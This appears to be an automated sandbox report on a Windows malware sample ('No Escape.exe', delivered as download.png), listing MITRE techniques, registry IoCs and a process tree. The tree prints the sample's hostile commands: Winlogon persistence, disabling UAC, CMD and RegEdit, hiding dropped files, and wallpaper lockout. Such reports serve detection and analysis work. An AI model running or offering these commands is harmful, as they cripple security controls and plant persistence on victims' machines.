f356c1e5e8ec22a79b2547dd939d824d40200e5c599b38c7d7b531f6b2778f51

Analysis

max time kernel
74s
max time network
75s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
01/10/2024, 18:56

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

download.png
Size

2KB
MD5

c1a0892088d55517ca579dd597de66f9
SHA1

465f3c4b77b1d2fb0fc8443ea44992db839eca01
SHA256

f356c1e5e8ec22a79b2547dd939d824d40200e5c599b38c7d7b531f6b2778f51
SHA512

db7ad5a8ad60a2505faf056673e27c3bec3034d245f874b22eee678b279b79561df8f1c7739663836e298469ffd99589e098abbba484738e217155afe0132cdb

Score

10^/10

discovery evasion persistence ransomware trojan

Malware Config

Signatures

Modifies WinLogon for persistence 2 TTPs 1 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\system32\\userinit.exe,C:\\launch.exe"	reg.exe

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Disables RegEdit via registry modification 1 IoCs

evasion

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	reg.exe

Downloads MZ/PE file

Sets file to hidden 1 TTPs 2 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1564.001

pid	Process
620	attrib.exe
220	attrib.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation	No Escape.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation	wscript.exe

Executes dropped EXE 1 IoCs

pid	Process
3572	No Escape.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
114	raw.githubusercontent.com
115	raw.githubusercontent.com

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\Desktop\wallpaper = "C:\\hello.jpg"	reg.exe

Drops file in Program Files directory 12 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\launch.exe	No Escape.exe
File created	C:\Program Files (x86)\mover.exe	No Escape.exe
File created	C:\Program Files (x86)\msg.exe	No Escape.exe
File created	C:\Program Files (x86)\mypc.exe	No Escape.exe
File created	C:\Program Files (x86)\shaking.exe	No Escape.exe
File created	C:\Program Files (x86)\	No Escape.exe
File created	C:\Program Files (x86)\erode.exe	No Escape.exe
File created	C:\Program Files (x86)\hello.reg	No Escape.exe
File opened for modification	C:\Program Files (x86)\	No Escape.exe
File created	C:\Program Files (x86)\date.txt	No Escape.exe
File created	C:\Program Files (x86)\hello.bat	No Escape.exe
File created	C:\Program Files (x86)\hello.jpg	No Escape.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	No Escape.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 17 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent	LogonUI.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1"	LogonUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133722825903110851"	chrome.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "182"	LogonUI.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
2780	reg.exe

Runs .reg file with regedit 1 IoCs

pid	Process
2844	regedit.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
4384	chrome.exe
4384	chrome.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs

pid	Process
4384	chrome.exe
4384	chrome.exe
4384	chrome.exe
4384	chrome.exe
4384	chrome.exe
4384	chrome.exe
4384	chrome.exe
4384	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	4384	chrome.exe
Token: SeCreatePagefilePrivilege	4384	chrome.exe
Token: SeShutdownPrivilege	4384	chrome.exe
Token: SeCreatePagefilePrivilege	4384	chrome.exe
Token: SeShutdownPrivilege	4384	chrome.exe
Token: SeCreatePagefilePrivilege	4384	chrome.exe
Token: SeShutdownPrivilege	4384	chrome.exe
Token: SeCreatePagefilePrivilege	4384	chrome.exe
Token: SeShutdownPrivilege	4384	chrome.exe
Token: SeCreatePagefilePrivilege	4384	chrome.exe
Token: SeShutdownPrivilege	4384	chrome.exe
Token: SeCreatePagefilePrivilege	4384	chrome.exe
Token: SeShutdownPrivilege	4384	chrome.exe
Token: SeCreatePagefilePrivilege	4384	chrome.exe
Token: SeShutdownPrivilege	4384	chrome.exe
Token: SeCreatePagefilePrivilege	4384	chrome.exe
Token: SeShutdownPrivilege	4384	chrome.exe
Token: SeCreatePagefilePrivilege	4384	chrome.exe
Token: SeShutdownPrivilege	4384	chrome.exe
Token: SeCreatePagefilePrivilege	4384	chrome.exe
Token: SeShutdownPrivilege	4384	chrome.exe
Token: SeCreatePagefilePrivilege	4384	chrome.exe
Token: SeShutdownPrivilege	4384	chrome.exe
Token: SeCreatePagefilePrivilege	4384	chrome.exe
Token: SeShutdownPrivilege	4384	chrome.exe
Token: SeCreatePagefilePrivilege	4384	chrome.exe
Token: SeShutdownPrivilege	4384	chrome.exe
Token: SeCreatePagefilePrivilege	4384	chrome.exe
Token: SeShutdownPrivilege	4384	chrome.exe
Token: SeCreatePagefilePrivilege	4384	chrome.exe
Token: SeShutdownPrivilege	4384	chrome.exe
Token: SeCreatePagefilePrivilege	4384	chrome.exe
Token: SeShutdownPrivilege	4384	chrome.exe
Token: SeCreatePagefilePrivilege	4384	chrome.exe
Token: SeShutdownPrivilege	4384	chrome.exe
Token: SeCreatePagefilePrivilege	4384	chrome.exe
Token: SeShutdownPrivilege	4384	chrome.exe
Token: SeCreatePagefilePrivilege	4384	chrome.exe
Token: SeShutdownPrivilege	4384	chrome.exe
Token: SeCreatePagefilePrivilege	4384	chrome.exe
Token: SeShutdownPrivilege	4384	chrome.exe
Token: SeCreatePagefilePrivilege	4384	chrome.exe
Token: SeShutdownPrivilege	4384	chrome.exe
Token: SeCreatePagefilePrivilege	4384	chrome.exe
Token: SeShutdownPrivilege	4384	chrome.exe
Token: SeCreatePagefilePrivilege	4384	chrome.exe
Token: SeShutdownPrivilege	4384	chrome.exe
Token: SeCreatePagefilePrivilege	4384	chrome.exe
Token: SeShutdownPrivilege	4384	chrome.exe
Token: SeCreatePagefilePrivilege	4384	chrome.exe
Token: SeShutdownPrivilege	4384	chrome.exe
Token: SeCreatePagefilePrivilege	4384	chrome.exe
Token: SeShutdownPrivilege	4384	chrome.exe
Token: SeCreatePagefilePrivilege	4384	chrome.exe
Token: SeShutdownPrivilege	4384	chrome.exe
Token: SeCreatePagefilePrivilege	4384	chrome.exe
Token: SeShutdownPrivilege	4384	chrome.exe
Token: SeCreatePagefilePrivilege	4384	chrome.exe
Token: SeShutdownPrivilege	4384	chrome.exe
Token: SeCreatePagefilePrivilege	4384	chrome.exe
Token: SeShutdownPrivilege	4384	chrome.exe
Token: SeCreatePagefilePrivilege	4384	chrome.exe
Token: SeShutdownPrivilege	4384	chrome.exe
Token: SeCreatePagefilePrivilege	4384	chrome.exe

Suspicious use of FindShellTrayWindow 34 IoCs

pid	Process
4384	chrome.exe
4384	chrome.exe
4384	chrome.exe
4384	chrome.exe
4384	chrome.exe
4384	chrome.exe
4384	chrome.exe
4384	chrome.exe
4384	chrome.exe
4384	chrome.exe
4384	chrome.exe
4384	chrome.exe
4384	chrome.exe
4384	chrome.exe
4384	chrome.exe
4384	chrome.exe
4384	chrome.exe
4384	chrome.exe
4384	chrome.exe
4384	chrome.exe
4384	chrome.exe
4384	chrome.exe
4384	chrome.exe
4384	chrome.exe
4384	chrome.exe
4384	chrome.exe
4384	chrome.exe
4384	chrome.exe
4384	chrome.exe
4384	chrome.exe
4384	chrome.exe
4384	chrome.exe
4384	chrome.exe
4384	chrome.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
4384	chrome.exe
4384	chrome.exe
4384	chrome.exe
4384	chrome.exe
4384	chrome.exe
4384	chrome.exe
4384	chrome.exe
4384	chrome.exe
4384	chrome.exe
4384	chrome.exe
4384	chrome.exe
4384	chrome.exe
4384	chrome.exe
4384	chrome.exe
4384	chrome.exe
4384	chrome.exe
4384	chrome.exe
4384	chrome.exe
4384	chrome.exe
4384	chrome.exe
4384	chrome.exe
4384	chrome.exe
4384	chrome.exe
4384	chrome.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2168	LogonUI.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4384 wrote to memory of 4896	4384	chrome.exe	88
PID 4384 wrote to memory of 4896	4384	chrome.exe	88
PID 4384 wrote to memory of 1540	4384	chrome.exe	89
PID 4384 wrote to memory of 1540	4384	chrome.exe	89
PID 4384 wrote to memory of 1540	4384	chrome.exe	89
PID 4384 wrote to memory of 1540	4384	chrome.exe	89
PID 4384 wrote to memory of 1540	4384	chrome.exe	89
PID 4384 wrote to memory of 1540	4384	chrome.exe	89
PID 4384 wrote to memory of 1540	4384	chrome.exe	89
PID 4384 wrote to memory of 1540	4384	chrome.exe	89
PID 4384 wrote to memory of 1540	4384	chrome.exe	89
PID 4384 wrote to memory of 1540	4384	chrome.exe	89
PID 4384 wrote to memory of 1540	4384	chrome.exe	89
PID 4384 wrote to memory of 1540	4384	chrome.exe	89
PID 4384 wrote to memory of 1540	4384	chrome.exe	89
PID 4384 wrote to memory of 1540	4384	chrome.exe	89
PID 4384 wrote to memory of 1540	4384	chrome.exe	89
PID 4384 wrote to memory of 1540	4384	chrome.exe	89
PID 4384 wrote to memory of 1540	4384	chrome.exe	89
PID 4384 wrote to memory of 1540	4384	chrome.exe	89
PID 4384 wrote to memory of 1540	4384	chrome.exe	89
PID 4384 wrote to memory of 1540	4384	chrome.exe	89
PID 4384 wrote to memory of 1540	4384	chrome.exe	89
PID 4384 wrote to memory of 1540	4384	chrome.exe	89
PID 4384 wrote to memory of 1540	4384	chrome.exe	89
PID 4384 wrote to memory of 1540	4384	chrome.exe	89
PID 4384 wrote to memory of 1540	4384	chrome.exe	89
PID 4384 wrote to memory of 1540	4384	chrome.exe	89
PID 4384 wrote to memory of 1540	4384	chrome.exe	89
PID 4384 wrote to memory of 1540	4384	chrome.exe	89
PID 4384 wrote to memory of 1540	4384	chrome.exe	89
PID 4384 wrote to memory of 1540	4384	chrome.exe	89
PID 4384 wrote to memory of 1924	4384	chrome.exe	90
PID 4384 wrote to memory of 1924	4384	chrome.exe	90
PID 4384 wrote to memory of 4900	4384	chrome.exe	91
PID 4384 wrote to memory of 4900	4384	chrome.exe	91
PID 4384 wrote to memory of 4900	4384	chrome.exe	91
PID 4384 wrote to memory of 4900	4384	chrome.exe	91
PID 4384 wrote to memory of 4900	4384	chrome.exe	91
PID 4384 wrote to memory of 4900	4384	chrome.exe	91
PID 4384 wrote to memory of 4900	4384	chrome.exe	91
PID 4384 wrote to memory of 4900	4384	chrome.exe	91
PID 4384 wrote to memory of 4900	4384	chrome.exe	91
PID 4384 wrote to memory of 4900	4384	chrome.exe	91
PID 4384 wrote to memory of 4900	4384	chrome.exe	91
PID 4384 wrote to memory of 4900	4384	chrome.exe	91
PID 4384 wrote to memory of 4900	4384	chrome.exe	91
PID 4384 wrote to memory of 4900	4384	chrome.exe	91
PID 4384 wrote to memory of 4900	4384	chrome.exe	91
PID 4384 wrote to memory of 4900	4384	chrome.exe	91
PID 4384 wrote to memory of 4900	4384	chrome.exe	91
PID 4384 wrote to memory of 4900	4384	chrome.exe	91
PID 4384 wrote to memory of 4900	4384	chrome.exe	91
PID 4384 wrote to memory of 4900	4384	chrome.exe	91
PID 4384 wrote to memory of 4900	4384	chrome.exe	91
PID 4384 wrote to memory of 4900	4384	chrome.exe	91
PID 4384 wrote to memory of 4900	4384	chrome.exe	91
PID 4384 wrote to memory of 4900	4384	chrome.exe	91
PID 4384 wrote to memory of 4900	4384	chrome.exe	91
PID 4384 wrote to memory of 4900	4384	chrome.exe	91
PID 4384 wrote to memory of 4900	4384	chrome.exe	91
PID 4384 wrote to memory of 4900	4384	chrome.exe	91
PID 4384 wrote to memory of 4900	4384	chrome.exe	91
PID 4384 wrote to memory of 4900	4384	chrome.exe	91

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
620	attrib.exe
220	attrib.exe

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\download.png
1⤵
PID:4916

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4384
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ff98085cc40,0x7ff98085cc4c,0x7ff98085cc58
  2⤵
  PID:4896
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1916,i,16272339021212978108,7401109276852452957,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=1908 /prefetch:2
  2⤵
  PID:1540
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2100,i,16272339021212978108,7401109276852452957,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=2216 /prefetch:3
  2⤵
  PID:1924
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2284,i,16272339021212978108,7401109276852452957,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=2488 /prefetch:8
  2⤵
  PID:4900
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3176,i,16272339021212978108,7401109276852452957,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3196 /prefetch:1
  2⤵
  PID:1256
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3228,i,16272339021212978108,7401109276852452957,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3220 /prefetch:1
  2⤵
  PID:1312
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4612,i,16272339021212978108,7401109276852452957,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4656 /prefetch:1
  2⤵
  PID:4100
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4832,i,16272339021212978108,7401109276852452957,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4840 /prefetch:8
  2⤵
  PID:1652
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4804,i,16272339021212978108,7401109276852452957,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4792 /prefetch:8
  2⤵
  PID:3080
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4884,i,16272339021212978108,7401109276852452957,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4952 /prefetch:8
  2⤵
  PID:4236
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4864,i,16272339021212978108,7401109276852452957,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4852 /prefetch:8
  2⤵
  PID:3504
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=5060,i,16272339021212978108,7401109276852452957,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4836 /prefetch:1
  2⤵
  PID:2732
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=3188,i,16272339021212978108,7401109276852452957,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3356 /prefetch:1
  2⤵
  PID:4444
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=3320,i,16272339021212978108,7401109276852452957,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3312 /prefetch:1
  2⤵
  PID:1000
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4056,i,16272339021212978108,7401109276852452957,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3204 /prefetch:8
  2⤵
  PID:4560
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5368,i,16272339021212978108,7401109276852452957,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5384 /prefetch:8
  2⤵
  PID:2948
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=3288,i,16272339021212978108,7401109276852452957,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5396 /prefetch:1
  2⤵
  PID:1812
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --field-trial-handle=3216,i,16272339021212978108,7401109276852452957,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3436 /prefetch:1
  2⤵
  PID:4920
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=3292,i,16272339021212978108,7401109276852452957,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4888 /prefetch:8
  2⤵
  PID:3156
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=4968,i,16272339021212978108,7401109276852452957,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5404 /prefetch:8
  2⤵
  PID:1936
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5552,i,16272339021212978108,7401109276852452957,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5600 /prefetch:8
  2⤵
  PID:1656
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5592,i,16272339021212978108,7401109276852452957,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5892 /prefetch:8
  2⤵
  PID:2832
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=6128,i,16272339021212978108,7401109276852452957,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=6136 /prefetch:8
  2⤵
  PID:2280
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5632,i,16272339021212978108,7401109276852452957,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5208 /prefetch:8
  2⤵
  PID:3536
- C:\Users\Admin\Downloads\No Escape.exe
  "C:\Users\Admin\Downloads\No Escape.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Drops file in Program Files directory
  - System Location Discovery: System Language Discovery
  PID:3572
- - C:\Windows\system32\wscript.exe
    "C:\Windows\sysnative\wscript.exe" C:\Users\Admin\AppData\Local\Temp\D136.tmp\D137.tmp\D138.vbs //Nologo
    3⤵
    - Checks computer location settings
    PID:4452
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\hello.bat" "
      4⤵
      PID:212
    - - C:\Windows\system32\attrib.exe
        
        attrib +s +h C:\msg.exe
        5⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:620
    - - C:\Windows\system32\attrib.exe
        
        attrib +s +h C:\launch.exe
        5⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:220
    - - C:\Windows\regedit.exe
        
        regedit /s hello.reg
        5⤵
        Runs .reg file with regedit
        
        PID:2844
    - - C:\Windows\system32\reg.exe
        
        reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System /v DisableLogonBackgroundImage /t REG_DWORD /d 1
        5⤵
        
        PID:2816
    - - C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /t REG_SZ /d C:\Windows\system32\userinit.exe,C:\launch.exe /f
        5⤵
        Modifies WinLogon for persistence
        
        PID:1604
    - - C:\Windows\system32\reg.exe
        
        reg add "HKEY_CURRENT_USER\control panel\desktop" /v wallpaper /t REG_SZ /d C:\hello.jpg /f
        5⤵
        Sets desktop wallpaper using registry
        
        PID:392
    - - C:\Windows\system32\reg.exe
        
        reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1
        5⤵
        
        PID:3828
    - - C:\Windows\system32\reg.exe
        
        reg ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        5⤵
        UAC bypass
        
        PID:548
    - - C:\Windows\system32\reg.exe
        
        reg add HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 2
        5⤵
        
        PID:4028
    - - C:\Windows\system32\reg.exe
        
        REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
        5⤵
        Disables RegEdit via registry modification
